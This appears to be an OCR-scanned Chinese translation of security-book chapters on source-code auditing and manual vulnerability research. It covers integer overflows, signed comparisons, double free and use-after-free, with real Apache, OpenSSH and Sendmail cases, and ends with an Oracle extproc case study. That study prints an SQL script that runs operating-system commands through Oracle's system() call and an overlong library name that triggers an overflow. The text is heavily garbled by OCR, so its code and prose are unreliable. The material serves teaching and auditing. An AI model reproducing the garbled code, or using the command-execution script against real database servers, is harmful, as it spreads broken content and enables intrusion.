/* it was finally rewritten to a remote URL */ 


/* skip 'scheme:' */ 
for (cp = r->filename; *cp != ':' && *cp !- 'NO'; cptt) 


/* skip '://' */ 


cp t= 3; 
Eis absolute uridA4T FIRE: 

int i = strlen(uri); 

if ( (i > 7 && strncasecmp(uri, "http://", 7) == 0) 
|| (i > 8 && strncasecmp(uri, "https://", 8) == 0) 
|| (i > 9 && strncasecmp(uri, "gopher://", 9) == 0) 
|| (1 > 6 && strncasecmp(uri, "ftp://", 6) == 0) 
|| (i > 5 && strncasecmp(uri, "ldap:", 5) == 0) 
[|| (i > 5 && strncasecmp(uri, "news:", 5) == 0) 
|| (i > 7 && strncasecmp(uri, "mailto:", 7) == 0) ) { 
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return 1; 
} 
else { 
return 0; 


} 

这 里 的 问题 出 在 行 c += 3， 处 理 代 码 试图 跳 过 URI 里 的 ://。 然 而 , 注意 在 is_absolute_uri 
里 ， 不 是 所 有 的 URI 都 以 :// 结束 。 如 果 被 请 求 的 URI 只 是 简单 的 ldap:a， 那 这 段 代码 可 能 会 跳 
过 以 改 0' 结 尾 的 字 节 。 再 详细 研究 URI 处 理 过 程 : 一 个 空 字 节 被 写 入 URI， 使 这 个 漏洞 潜在 地 可 
利用 。 在 这 个 特殊 的 例子 里 ， 必 须 适 当 使 用 某 些 重 写 规 则 ， 但 在 许多 开源 代码 库 中 ， 类 似 的 问题 
还 是 很 常见 的 ， 我 们 在 审计 时 应 当 考 虑 这 些 情 况 。 

18.4.9 有 符号 数 比较 漏洞 

许多 程序 员 检 查 用 户 的 输入 ， 但 是 ， 当 使 用 有 符号 长 度 分 类 符 〈signed-length specifiers) I, 
检查 并 没有 正确 结束 。 许 多 长 度 分 类 符 (specifies) (例如 size_t) 是 无 符号 的 ， 就 不 会 像 有 符 
号 长 度 分 类 符 〈 例 如 off co) 那样 受到 这 种 问题 的 影响 。 如 果 比 较 两 个 有 符号 整数 ， 特 别 是 比较 
两 个 常量 ， 在 做 长 度 检查 时 ， 可 能 不 会 考虑 它们 小 于 0 的 可 能 性 。 

从 编译 代码 的 角度 来 看 ， 我 们 没有 必要 明确 指出 不 同类 型 整数 之 间 的 比较 标准 ， 因 此 ,我 们 
必须 感谢 那些 指出 真正 正确 的 编译 器 行为 的 友人 。ISO C 标 准 规定 ， 如 果 两 个 不 同类 型 或 长 度 的 
整数 相 比较 ， 它 们 首先 被 转换 成 有 符号 的 int 类 型 ， 然 后 再 进行 比较 。 如 果 其 中 一 个 整数 的 类 型 
比 一 个 有 符号 int 长 度 大 ， 那 么 这 两 个 整数 都 要 转换 到 大 的 类 型 ， 然 后 再 做 比较 。 当 一 个 无 符号 
int 和 有 符号 int 比 较 时 ， 无 符号 类 型 比 有 符号 类 型 大 ， 将 被 优先 处 理 。 例 如 ， 下 面 是 无 符号 数 
比较 : 

if((int)left < (unsigned int)right) 

然而 ， 下 面 这 个 比较 是 有 符号 的 : 

if((int)left < 256) 

某 些 操作 符 〈 如 sizeof () ) 是 无 符号 的 。 即 使 sizeof 操 作 符 的 结果 是 常量 ， 下 列 比 较 也 是 
无 符号 的 : 

if((int) left < sizeof (buf) ) 

然而 ， 下 面 的 比较 是 有 符号 的 ， 因 为 在 比较 之 前 ， 两 个 短 整 型 被 转换 成 有 符号 整 型 

if((unsigned short)a < (short)b) 

在 很 多 情况 下 , 特别 是 使 用 32 位 整 型 的 情况 下 , 为 了 绕 过 长 度 检 查 , 你 必须 能 直接 指定 整 型 。 
例如 ， 在 实际 情况 中 ， 它 不 可 能 促成 strlen() 返 回 一 个 趋向 负数 的 值 ， 但 是 ， 如 果 使 用 某 个 方 
法 从 一 个 数据 包 中 得 到 一 个 整数 ， 一 个 整 型 被 直接 从 一 个 包 中 取 回 ， 将 有 可 能 使 strlen () 成 为 
负数 。 

在 2002 年 由 NGSSoftware 的 Mark Litchfield 发 现 的 Apache chenked-encoding 漏 洞 ， 就 是 有 符号 
数 比 较 所 导致 的 ， 下 面 这 段 代 码 是 可 能 出 问题 的 地 方 : 
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len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining; 


len read = ap_bread(r->connection->client, buffer, len to read); 

在 这 个 例子 里 ，bufsiz 是 指示 缓冲 区 剩余 空间 的 有 符号 数 ，r->remaining 是 off_t 类 型 的 
有 符号 数 ， 可 直接 从 请 求 里 指定 块 (chunk〉 的 大 小 。 计 划 变 量 len_to_read 的 值 取 bufsiz 或 
r->remaining 的 最 小 值 ， 但 如 果 块 的 大 小 是 负数 ， 它 可 能 绕 过 检查 。 当 负数 传 给 ap_bread 时 ， 
会 变 成 非常 大 的 正 数 ， 从 而 导致 很 大 范围 的 memcpy。 这 个 错误 非常 明显 ， 在 Win32 上， 通过 改写 
SEH 可 以 轻易 利用 它 。Gobbles Security Group 证 实 ， 由 于 memcpy 实 现 的 “个 错误 ， 它们 在 BSD 上 
也 是 可 利用 的 。 

今天 , 在 软件 里 依然 可 以 看 到 这 类 漏洞 。 我 们 在 磁 到 用 有 符号 整 型 作为 长 度 分 类 符 的 情形 时 ， 
要 仔细 审计 这 类 漏洞 。 
18.410 ”整数 相关 漏洞 

整数 溢出 似乎 已 经 成 为 安全 研究 者 的 口头 禅 , 常用 它 来 描述 大 多 数 漏 洞 , 但 很 多 与 整数 溢出 
并 不 相干 。2002 年 ， 在 USA BlackHat 的 “Professional Source Code Auditing ”演讲 中 ， 第 一 次 提 到 
整数 溢出 ， 尽 管 在 这 之 前 ， 一 些 安全 研究 者 已 经 知道 怎样 发 现 这 些 溢出 了 。 

当 整 数 超 出 它 的 最 大 值 或 者 低 于 它 的 最 小 值 时 , 会 发 生 整数 溢出 。 整 数 的 最 大 值 或 最 小 值 由 
它 的 类 型 和 大 小 〈size) 定义 。16 位 有 符号 整数 的 最 大 值 是 32 767 (0x7fff)， 最 小 值 是 -32 768 
(-0x8000)。32 位 无 符号 整数 的 最 大 值 是 4 294 967 295 〈(0xffffffff)， 最 小 值 是 0。 如 果 一 个 16 
位 有 符号 整数 的 值 是 32 767， 加 1 的 话 ， 它 的 值 就 会 变 成 -32 768， 导 致 整数 溢出 。 

当 你 想 绕 过 长 度 检 查 , 或 因 缓 冲 区 太 小 而 不 能 容纳 复制 它 的 数据 而 促使 再 分 配 缓冲 区 时 ， 整 
数 溢出 是 有 用 的 。 整 数 溢出 通常 分 为 两 类 : 加 /减法 溢出 ， 乘 法 溢出 。 

加 /减法 溢出 的 原因 是 : 两 个 数 相 加 或 相 减 时 ， 结 果 超 出 最 大 值 / 最 小 值 的 范围 。 例 如 ， 下 
面 的 代码 可 能 会 引起 整数 溢出 。 


char *buf; 
int allocation_size = attacker_defined_size + 16; 





buf = malloc(allocation_size); 
memcpy(buf,input,attacker defined size); 


TEXX^ MIT €, üli&attacker defined sizeJé-164I—12. [RIA (E. IES | RAH 
tH, malloc O 调用 分 配 的 缓冲 区 太 小 ， 无 法 容纳 memcpy() 调用 复制 的 数据 。 在 开源 程序 中 ， 还 
可 以 看 到 类 似 的 代码 。 尽 管 利用 这 类 漏洞 存在 一 定 的 困难 ， 但 这 些 错误 确实 存在 。 

当 程 序 期 望 用 户 输入 最 小 长 度 时 ， 通 常 可 以 发 现 减 法 溢出 。 下 列 代码 易 受 整数 溢出 的 影响 。 

#define HEADER_SIZE 16 


char data[1024],*dest; 
int n; 


n = read(sock,data, sizeof (data) ); 
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dest = malloc(n); 
memcpy (dest, datat+tHEADER_SIZE,n - HEADER SIZE); 


在 这 个 例子 里 ， 如 果 读 完 的 网 络 数据 小 于 预期 的 最 小 长 度 (HEADER_SIZE)， 在 memcpy 的 第 
三 个 参数 里 会 发 生 整 数 重合 (wrap)。 

当 两 个 数 相 乘 的 结果 超出 整 型 的 最 大 长 度 时 ， 发 生 乘 法 溢出 。2002 年 ， 在 OpenSSH 和 Sun 的 
RPC 库 里 发 现 了 这 类 漏洞 。 下 面 的 代码 摘自 OpenSSH (3.4 之 前 的 版 本 )， 是 一 个 典型 的 乘法 溢出 
例子 。 

nresp = packet_get_int(); 

if (mresp > 0) { 

response = xmalloc(nresp * sizeof(char*)); 
for (i = 0; i < nresp; i++) 
response[i] = packet get string(NULL); 

} 

在 这 个 例子 里 ，nresp 是 直接 来 自 SSH 数 据 包 的 整数 。 它 和 字符 指针 的 大 小 《在 这 里 是 4) 相 
乘 ， 结 果 作为 分 配 目标 缓冲 区 的 大 小 。 如 果 nresp 大 于 0x3fffffff， 相 乘 后 的 结果 将 超出 无 符号 
整 型 的 最 大 值 ， 产 生 溢出 。 如 果 分 配 的 内 存 非 常 小 ， 但 把 大 量 的 字符 指针 复制 到 它 里 面 ， 可 能 引 
起 谥 出 。 有 趣 的 是 , 正 是 因为 OpenBSD 采 用 了 更 安全 的 堆 实 现 , 没有 在 堆 上 保存 内 髓 的 控制 结构 ， 
从 而 导致 在 OpenBSD 上 可 以 利用 这 个 特殊 的 漏洞 。 对 于 有 内 峰 控 制 结构 的 堆 实现 , 带 有 大 量 指针 
的 堆 出 现 恶 化 后 ， 在 其 后 的 分 配 过 程 中 将 导致 斋 沉 ， 例 如 在 packet_get_string 中 。 

较 小 的 整数 更 容易 发 生 整 数 洲 出 ，16 位 整数 类 型 经 常见 例 程 〈 例 如 strlen() ) 处 理 后 ， 可 能 
会 出 现 整 数 重合。 这 类 整数 溢出 是 导致 Rtl1DosPathNameToNtPathName_U 洲 出 的 原因 ， 上 典型 的 例 
子 是 IIS WebDAV 漏 洞 ， 详 细 描 述 见 Microsoft Security Bulletin MS03-007。 

整数 相关 漏洞 出 现 的 频率 很 高 , 在 软件 中 经 常 可 以 见 到 它们 的 身影 。 虽然 许多 程序 员 注意 到 
了 字符 串 相关 操作 的 危险 ,但 却 不 太 关注 与 整数 操作 相关 的 危险 。 在 未 来 的 几 年 中 ， 类 似 的 漏洞 
可 能 还 会 出 现 。 

18.4.11 不 同 大 小 的 整数 转换 

在 两 个 不 同 大 小 的 整数 间 转 换 ， 可 能 会 得 到 意外 的 结果 。 如 果 没 有 仔细 考虑 ， 这 些 转换 可 能 
有 人 危险 。 如 果 在 源码 中 发 现 这 种 转换 ， 应 该 对 它们 进行 仔细 检查 。 这 种 转换 可 能 导致 值 截断 
(trancation)、 符 号 转换 或 值 的 符号 扩展 ， 有 了 时候 能 导致 形成 可 利用 的 安全 问题 。 

从 大 整 型 到 小 整 型 的 转换 〈32 到 16 位 或 16 到 8 位 ) 可 能 导致 值 截断 或 符号 转换 。 例 如 ， 如 果 
一 个 有 符号 32 位 整 型 的 值 为 -65 535， 被 转换 成 16 位 整数 ， 由 于 截断 了 整数 的 高 16 位 ， 从 而 得 到 
值 为 十 1 的 16 位 整数 。 

根据 源 和 目标 的 类 型 ， 从 小 到 大 的 整数 类 型 转换 可 能 会 导致 符号 扩展 。 例 如 ， 把 有 符号 16 
位 整 型 数 -1 转换 为 无 符号 32 位 整 型 时 ， 得 到 结果 比 4GB 略 小 。 

表 18-1 有 助 于 了 解 整数 间 的 转换 。 对 于 最 近 版 本 的 GCC， 该 表 是 准确 的 。 

希望 这 个 表 有 助 于 淤 清 不 同 大 小 整数 间 的 相互 转换 问题 。 最 近 ， 在 Sendmail 里 的 prescan 函 
数 中 发 现 的 漏 润 是 这 类 漏洞 的 好 例子 。 从 输入 缓冲 区 得 到 一 个 有 符号 字符 (8 位 )， 转 换 成 有 符号 
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的 32 位 整数 。 这 个 字符 被 符号 扩展 到 32 位 ， 值 为 -1， 对 特殊 情形 NocHAR 的 定义 也 会 出 现 这 些 。 
这 将 导致 函数 及 远程 可 利用 的 缓冲 区 溢出 的 边界 检查 失败 。 

大 家 都 认为 ， 在 不 同 大 小 整数 之 间 相 互 转换 是 非常 复杂 的 ， 如 果 没 有 仔细 考虑 ， 它 们 可 能 会 
引起 很 多 错误 。 在 现代 程序 中 几乎 不 需要 使 用 不 同 大 小 的 整数 , 如 果 你 在 审计 时 发 现 了 这 种 情况 ， 
需要 深入 研究 它们 的 使 用 。 


表 18-1 整数 转换 表 





源 大 小 /类 型 源 值 转换 之 后 的 大 小 /类 型 转换 之 后 的 值 
16 位 ， 有 符号 -1 〈0xffff) 32 位 ， 无 符号 4294967295 〈0xffffffff》 
16 位 ， 有 符号 -] COxffff) 32 位 ， 有 符号 -1 COxfffffffD 

16 位 ， 无 符号 65535 COxffff) 32 位 ， 无 符号 65535 (OxfffD 

16 位 ， 无 符号 65535 (Oxffff) 32 位 ， 有 符号 65535 〈0xffff) 

32 位 ， 有 符号 -1 〈0xffffffff) 16 位 ， 无 符号 65535 COxffff) 

324. ATES —1 COXfffffffD 16 位 ， 有 符号 -1 COxffff) 

32 位 ， 无 符号 32 768 (0x8000) 16 位 ， 无 符号 32 768 (0x8000) 

32 位 ， 无 符号 32 768 (0x8000) 16 位 ， 有 符号 -32768 (0x8000) 

32 位 ， 有 符号 -40 960 COxffff6000) 16 位 ， 有 符号 24576 (0x6000) 


18.412 二 次 释放 错误 

尽管 二 次 释放 可 能 引起 内 存 亚 化， 甚至 允许 攻 击 者 执行 代码 。 但 某 些 堆 实现 不 受 它 的 影响 ， 
或 对 它 有 一 定 的 免疫 力 ， 因 此 ， 只 有 在 某 些 平台 上 ， 二 次 释放 错误 才 是 可 以 利用 的 漏洞 。 

现在 的 程序 员 很 少 犯 二 次 释放 的 错误 了 尽管 我 们 曾经 看 到 过 )。 二 次 释放 错误 经 常 出 现在 
保存 全 局 范围 指针 的 堆 缓冲 区 里 。 当 全 局 指针 被 释放 时 ,程序 通常 把 它 设 为 空 值 ， 防 止 被 其 他 程 
序 重用 。 如 果 程 序 没有 这 样 做 ， 那 么 对 我 们 来 说 ， 在 这 样 的 堆 块 里 寻找 二 次 释放 是 不 错 的 主意 。 
在 C++ 代码 里 ， 如 果 你 撤销 〈destroying) 类 的 实例 ， 而 类 的 某 些 成 员 已 被 释放 ， 那 么 也 可 能 产生 
这 类 漏洞 。 

最 近 ， 在 zlib 中 发 现 的 在 解压 缩 期 间 触发 某 个 错误 时 全 局 变量 释放 二 次 的 漏洞 ， 以 及 最 近 在 
CVS 服 务 器 中 发 现 的 漏洞 ， 都 是 二 次 释放 的 结果 。 
18.4.13 ”超出 范围 的 内 存 使 用 漏洞 

程序 使 用 的 内 存 区 域 都 有 一 定 的 范围 和 生命 期 , 在 它们 生效 前 或 失效 后 , 使 用 它们 都 会 带 来 
安全 风险 ， 如 内 存 恶 化 《〈 它 可 以 引起 任意 代码 执行 )。 
18.4.14 ”使 用 未 初始 化 的 变量 


在 程序 中 一 般 很 少见 到 使 用 未 初始 化 变量 的 情形 ， 因 为， 如 果 程 序 有 这 样 的 错误 ,在 首次 运 
行 时 ， 就 有 可 能 出 现 被 利用 的 情形 而 被 发 现 。 静 态 内 存 ， 如 可 执行 文件 的 .data 或 .bss 段 里 的 变 
量 ， 在 程序 执行 前 会 被 初始 化 为 空 值 。 但 对 于 栈 或 堆 变量 来 说 ， 程 序 并 没有 为 它们 初始 化 ， 所 以 
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程序 员 在 使 用 前 ， 必 须 明 确 把 它们 初始 化 ， 以 保证 程序 可 靠 运行 。 

如 果 变 量 未 被 初始 化 ,在 默认 情况 下 ， 它 的 内 容 是 随机 的 。 不 过 ， 我 们 有 机 会 猜 出 未 初始 化 
内 存 区 域 里 包含 的 数据 。 比 如 说 ， 未 初始 化 的 栈 局 部 变量 的 内 容 可 能 是 上 次 函数 调用 时 遗留 的 数 
据 ， 有 可 能 是 函数 的 参数 、 保 存 的 寄存 器 或 函数 的 局 部 变量 ， 有 具体 是 何 内 容 要 看 它 在 栈 中 的 位 置 
了 。 如 果 攻 击 者 很 幸运 ， 正 确 控制 了 这 样 的 内 存 块 ， 那 他 就 有 机 会 破解 这 类 漏洞 。 

由 未 初始 化 变量 导致 的 漏洞 比较 少见 , 因为 它们 的 存在 将 导致 程序 直接 崩溃 , 很 容易 被 发 现 。 
因此 ， 这 类 漏洞 一 般 潜 伏 在 那些 很 少 被 执行 的 代码 段 中 ， 如 那些 需要 触发 罕见 错误 才 会 被 执行 的 
代码 段 。 很 多 编译 器 在 编译 时 将 检查 未 初始 化 变量 ， 例 如 ， 微 软 的 Visual C++ 自 带 一 些 检测 措施 ， 
GCC 也 为 此 做 过 一 些 努 力 ， 但 两 者 的 效果 都 不 理想 ， 因 此 ， 程 序 员 有 责任 避免 再 犯 这 类 错误 。 

下 面 的 例子 假设 使 用 了 未 初始 化 变量 。 


int vuln_fn(char *data,int some_int) { 





char *test; 


if(data) { 
test = malloc(strlen(data) + 1); 
strcpy(test,data); 
some function(test); 


) 


if(some int « 0) { 
free(test); 
return -1; 


} 


free(test); 
return 0; 


} 

在 这 个 例子 里 ， 如 果 参 数 data 为 空 值 ， 指 针 test 没 被 初始 化 。 当 函数 在 后 面 释放 它 时 ， 它 
处 于 未 初始 化 的 状态 。 注 意 :;， gcc 或 Visual C++ 在 编译 时 ， 都 不 会 警告 程序 员 存 在 这 个 错误 。 

尽管 这 类 漏洞 具有 的 特性 导致 它 可 以 被 自动 检测 到 ， 但 现在 的 程序 中 仍 可 能 出 现 这 类 错误 
《如 2002 年 ，Stefan Esser 在 PHP 里 发 现 的 错误 )。 尽 管 未 初始 化 变量 漏洞 比较 少见 ， 但 它们 之 中 也 
有 很 复杂 的 情况 ， 很 可 能 会 在 程序 中 潜伏 多 年 。 l 


18.4.15 ”释放 后 再 使 用 漏洞 

每 个 堆 缓冲 区 都 有 生命 周期 从 它们 被 分 配 开 始 ， 到 通过 free 或 零 字 节 realloc 释 放 它们 这 
段 时 间 止 。 在 它们 被 释放 后 ， 任 何 试图 写 入 堆 缓冲 区 的 操作 都 可 能 引起 内 存 恶 化 ， 最 终 导致 执行 
任意 代码 。 . 

当 指 向 堆 缓 冲 区 的 指针 保存 在 不 同 的 内 存 区 域 时 , WERKERS 或 者 指向 堆 缓 溃 
区 不 同 偏 移 的 指针 被 使 用 , 但 原来 的 缓冲 区 却 被 释放 了 ， 这 种 情况 最 有 可 能 发 生 释 放 后 再 使 用 漏 
洞 。 这 类 漏洞 会 引起 未 知 的 堆 恶 化， 一 般 在 开发 过 程 中 就 能 被 根除 。 如 果 释 放 后 再 使 用 漏洞 潜伏 
到 软件 的 发 行 版 , 那么 它 最 有 可 能 位 于 很 少 被 执行 或 处 理 的 代码 段 里 。 2003 年 5 月 发 现 的 Apache 2 
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psprintf 漏 洞 就 是 释放 后 再 使 用 的 例子 ， 活 动 的 内 存 节点 被 意外 释放 后 ， 又 被 Apache 的 类 似 
malloc 的 分 配 例 程 分 发 。 


18.4.16 多 线程 问题 和 重 入 安全 代码 


大 多 数 开源 程序 不 是 多 线程 的 , 然而 , 许多 多 线程 程序 并 没有 采取 必要 的 措施 确保 它们 的 线 
程 安全 。 在 多 线程 程序 里 ， 不 同 的 线程 访问 同一 全 局 变量 时 ， 如 果 没 有 适当 的 锁定 ， 可 能 会 导致 
潜在 的 安全 问题 。 这 类 错误 一 般 很 难 发 现 ， 除 非 用 非常 大 的 负载 对 程序 进行 压力 测试 ， 否 则 很 可 
能 错过 它们 ， 或 者 把 它们 作为 间歇 式 的 软件 错误 ， 而 从 来 没有 验证 。 

2002 年 8 月 ，Michal Zalewski 在 Problems with Msktemp 里 提 到 ， 当 全 局 变量 处 在 意外 状态 下 
时 UNIX 的 信和 号 发 送 能 导致 执行 被 停止 。 如 果 在 信号 处 理 的 程序 中 ， 没 有 安全 地 使 用 可 重 入 的 库 
函数 ， 很 可 能 导致 内 存 恶 化 。 

尽管 许多 函数 有 线程 版 本 和 重 入 安全 版 本 ， 但 在 多 线程 或 重 入 〈re-entrant) 代码 中 也 不 总 是 
会 使 用 它们 。 审 计 这 类 漏洞 时 ， 需 要 在 头脑 中 有 多 线程 的 概念 。 这 样 有 助 于 我 们 理解 在 库 函 数 之 
后 程序 又 做 了 些 什 么 ， 而 这 些 可 能 就 是 问题 的 真正 源头 。 如 果 你 的 头脑 中 有 这 个 概念 ， 线 程 相 关 
的 问题 也 不 是 很 难 。 


18.5 ”超越 识别 : 真正 的 漏洞 和 错误 


在 很 多 时 候 , 我 们 发 现 的 软件 错误 并 不 是 真正 的 安全 漏洞 。 安 全 研究 者 在 采取 进一步 措施 之 
前 ， 必 须 了 解 错误 的 影响 范围 。 尽 管 在 成 功利 用 它 之 前 通常 没有 办 法 确认 错误 的 全 部 影响 ， 但 通 
过 简单 的 源码 审计 就 完成 大 量 乏 味 的 安全 工作 。 

从 漏洞 点 回溯 来 确定 触发 漏洞 的 必要 条 件 是 非常 有 用 的 。 确 保 在 活动 代码 里 真正 存在 漏洞 ， 
攻击 者 能 控制 所 有 的 变量 ， 并 核实 在 代码 流 的 适当 位 置 没有 为 防止 错误 而 进行 明显 的 检查 。 你 必 
须 经 常 检查 随 软件 一 起 分 发 的 配置 文件 ， 以 确认 在 一 般 情况 下 这 些 选项 的 状态 ( 开 或 关 )。 这 些 
简单 的 检查 可 以 使 我 们 在 编写 破解 代码 时 节省 大 量 时 间 , 就 不 必 为 不 成 为 问题 的 问题 编写 破解 而 
BIET. 


18.6 ”小结 


MT RAN RSS ABRE, 但 有 时 候 又 充满 乐趣 。 作 为 审计 者 ， 你 可 能 会 搜寻 一 些 并 不 存 
在 的 东西 ， 为 了 找 出 有 价值 的 东西 ， 你 必须 下 很 大 的 决心 。 当 然 ， 幸 运 之 神 可 能 会 降临 ， 但 是 始 
终 如 一 的 漏洞 研究 通常 意味 着 数 小 时 的 刻苦 审计 和 文档 编写 。 事实 证 明 , 每 个 大 的 软件 包 中 都 存 
在 可 利用 的 安全 漏洞 。 尽 情 享受 审计 的 乐趣 吧 。 











































































手工 的 方法 














* 们 在 前 面 伦 了 大 量 的 篇 幅 介绍 模糊 测试 ， 你 可 能 会 因此 认为 ， 在 寻找 漏洞 时 不 再 需要 

手工 调查 了 。 但 通过 本 章 的 学 习 ， 你 会 认识 到 这 种 想法 是 不 正确 的 ， 在 安全 研究 领域 

里 ， 手 工 调查 一 直 占有 一 席 之 地 ， 并 且 到 现在 又 有 了 长 足 的 发 展 。 我 们 将 从 讨论 手工 调查 开始 ， 

接着 研究 手工 调查 的 思维 过 程 ， 并 介绍 一 些 特定 漏洞 的 寻找 方法 。 之 后 将 概述 输入 验证 ， 以 及 绕 

过 输入 验证 的 方法 。 输 入 验证 是 研究 过 程 中 经 常会 遇 到 的 问题 ， 但 只 要 稍 深 入 地 理解 这 个 福 念 ， 
我 们 就 会 做 出 更 有 力 的 攻击 ， 对 防御 技术 的 理解 也 会 更 透彻 。 


19.1 原则 


我 们 的 目的 是 尽量 简化 研究 者 的 系统 概念 , 使 他 把 精力 放 在 系统 的 结构 和 行为 上 ， 从 技术 角 
度 审视 安全 技术 ， 而 不 会 被 厂商 的 文档 或 源码 所 牵制 。 尽 管 基本 技能 很 重要 ， 但 与 此 相 比 ， 态 度 
和 方法 更 重要 。 我们 的 经 验 是 ， 正确 的 方法 将 指导 我 们 发 现 错误 ， 而 这 些 错误 对 开发 团队 来 说 是 
“不 做 考虑 的 ”% 因为 他 们 可 以 查阅 源码 ， 明 显 的 错误 会 被 发 现 而 得 以 改正 ， 因 此 ， 剩 下 的 都 是 一 
HOA RSME IR 〈 如 复杂 的 C 宏 定义 ) 当然 , 这 些 错 误 也 可 能 是 因为 没有 考虑 系统 各 组 件 之 间 的 
相互 作用 而 导致 的 。 抛 开 规则 ， 也 算是 解放 思想 。 

该 方法 的 原则 归纳 如 下 。 

a 不 阅读 系统 的 文档 和 源码 ， 试 着 通过 其 他 途径 了 解 它 。 

a 检查 可 能 存在 漏洞 的 区 域 。 在 检查 期 间 ， 使 用 系统 跟踪 分 析 工 具 观 察 系统 行为 ， 并 注意 

这 些 行为 在 哪里 有 分 支 “ 有 了 时候 可 能 不 明显 )。 

Q 观察 异常 行为 ， 尝 试 对 系统 进行 攻击 并 观察 它 的 响应 。 

O 重复 这 个 过 程 ， 直 到 你 了 解 所 有 的 系统 行为 为 止 。 

上 面 的 描述 比较 抽象 ， 或 许 具 体 的 例子 更 能 说 明 问 题 。 


19.2 Oracle extproc 溢出 


Oracle extprocité Hi 4p f 5755 ZEBIR, — WLotn.oracle.com/deploy/security/pdf/ 2003alert57. 
pdf。 与 之 相关 的 Next Generation Software (NGS) 报告 可 以 参阅 www.ngssoftware.com/advisories/ 


ora-extproc.txt. 


2002 年 9 月 ， 为 寻找 新 的 安全 漏洞 ，Next Generation Software 准 备 重点 审计 Oracle RDBMS, 
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考虑 到 其 他 的 安全 组 织 可 能 审计 过 Oracle DBMS， 因 此 ，NGS 的 这 次 审计 格外 严格 。 在 此 之 前 ， 
David Litchfield 在 extproc 机 制 里 已 经 发 现 了 一 个 bug， 因 此 这 次 我 们 决定 重新 审计 这 一 机 制 。 了 
fif David Litchfield 怎 样 发 现 第 一 个 bug 的 细节 对 接 下 来 的 学 习 很 重要 。 

高 级 DBMS 一 般 都 支持 “ 自 有 的 ”SQL (Structured Query Language， 结 构 化 查询 语言 )，SQL 
支持 更 复杂 的 脚本 ， 甚 至 允许 创建 过 程 。 比 如 说 ，SQL Server 自 有 的 方言 被 称 为 Transact-SQL， 
支持 WHILE 循环 、 正 语句 等 ， 除 此 之 外 ，SQL Server 还 可 on “扩展 存储 过 程 ”( 这 些 是 DLL 里 
的 自 定 义 函 数 ， 可 以 用 C/C++ 来 写 ) 直接 和 操作 系统 进行 交 

SQL Server 的 扩展 存储 过 程 中 一 Hartt BSCE IR, 所 以 我 们 推测 ， 使 用 类 似 机 
制 的 DBMS 也 可 能 会 存在 类 似 的 问题 。 下 面 介绍 Oracle 的 扩展 存储 过 程 。 

Oracle 提 供 的 功能 比 SQL Server 的 扩展 存储 过 程 更 丰富 ， 它 允许 用 户 调用 任意 库 函 数 ， 而 不 仅仅 
是 那些 预先 定义 好 的 规范 函数 。 在 Oracle 里 ， 被 调用 的 外 部 函数 库 被 称 为 外 部 过 程 ， 在 二 级 过 程 
extproc 里 实现 ,extproc 作 为 Oracle 提 供 的 额外 服务 , 可 以 用 类 似 的 方式 连 到 它 自 己 的 数据 库 服务 。 

另外 需要 重点 掌握 的 是 TNS (Transparent Network Substrate) 协议 。 它 是 Oracle 架 构 体 系 的 一 
部 分 ， 用 来 管理 Oracle 过 程 与 客户 端 和 系统 其 他 部 分 间 的 通信 。TNS 是 一 个 二 进 制 头 部 的 、 基 于 
文本 的 协议 ， 支 持 很 多 命令 ,但 一 般 用 来 启动 、 停 止 和 管理 其 他 的 Oracle 服 务 。 

我 们 决定 先 查 看 extproc 干 了 些 什么 。 以 Windows 上 的 Oracle 为 例 ， 在 Oracle 过 程 里 获得 所 有 
的 标准 套 接 字 调 用 ， 并 在 它们 上 面 设置 断 点 connect. accept, recv. recvfrom. readfile, 
writefile 等 ， 这 就 得 到 了 大 量 的 外 部 进程 调用 。 

David Litchfield 发 现 ，Oracle 在 调用 扩展 存储 过 程 时 ， 使 用 了 一 系列 的 TNS 调 用 ， 后 面 是 产生 扩 
展 存储 过 程 调 用 的 简单 协议 , extproc 假 设 与 Oracle 间 的 通信 肯定 是 在 其 他 连接 的 有 效 期 内 , 而 不 再 
进行 认证 。 这 有 暗示 我 们 : 如 果 你 能 ( 像 远 程 攻击 者 一 样 ) 直接 用 extproc 调 用 函数 库 ，( 假 定 ) 可 以 
运行 libc 或 msvcrt.d11 (在 Windows 上 ) 里 的 system 函 数 ， 那 就 能 轻易 攻击 服务 器 了 。 昌 然 有 很 多 
的 措施 可 以 减轻 它 带 来 的 影响 ， 但 在 默认 安装 情况 下 在 Oracle 修 复 这 个 错误 之 前 )， 就 是 这 样 。 

我 们 把 这 个 错误 向 Oracle 做 了 通报 ， 并 和 他 们 一 起 发 布 了 补丁 。 你 可 以 在 otn.oracle.com/ 
deploy/security/pdf/lsextproc_alert.pdf 查 看 这 个 警报 (295). David Litchfield 的 建议 见 
ngssoftware.com/advisories/orap|sextproc.txt. 

因为 Oracle 在 这 个 区 域 里 的 行为 非常 敏感 〈 在 系统 安全 方面 )， 我 们 决定 再 次 审阅 所 有 与 外 
部 过 程 有 关 的 行为 ， 希 望 找到 更 多 有 价值 的 信息 。 

实现 上 述 的 调用 方法 很 简单 ， 通 过 调试 Oracle， 运 行 下 面 的 脚本 ， 你 就 能 看 到 TNS 的 命令 了 
(摘自 David 的 精彩 论文 “HackProofing Oracle Application Sever”， 在 www.ngssoftware.com/papers/ 
hpoas.pdf 可 以 找到 )。 


Rem 





Rem oracmd.sql 

Rem 

Rem Run system commands via Oracle database servers 
Rem 

Rem Bugs to david@ngssoftware.com 
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CREATE OR REPLACE LIBRARY exec shell AS 
'CiNinntNsystem32Wasvcrt.dll'; 

/ 

show errors 

CREATE OR REPLACE PACKAGE oracmd IS 
PROCEDURE exec (cmdstring IN CHAR); 

end oracmd; 

/ 

Show errors 

CREATE OR REPLACE PACKAGE BODY oracmd IS 
PROCEDURE exec(cmdstring IN CHAR) 

IS EXTERNAL 

NAME "system" 

LIBRARY exec shell 

LANGUAGE C; end oracmd; 

/ 


show errors 

然后 运行 以 下 脚本 开始 真正 的 执行 过 程 : 

exec oracmd.exec ('dir > c:\oracle.txt); 

从 一 开始 ， 我 们 就 试 着 在 create or replace 1ibrary 语 句 里 手工 插入 常见 的 查询 ， 然后 
(在 调试 器 里 和 FileMon 中 ) 观察 系统 的 响应 。 当 提交 一 个 过 长 的 函数 库 名 时 ， 出 现 了 意外 : 

CREATE OR REPLACE LIBRARY ext_lib IS '"AAAAAAAAAAAAAAAAAAAAAAAAA...'; 


然后 在 它 里 面 调用 一 个 函数 : 


CREATE or replace FUNCTION get_valzz 
RETURN varchar AS LANGUAGE C 
NAME "c_get_val" 
LIBRARY ext_lib; 


select get_valzz from dual; 

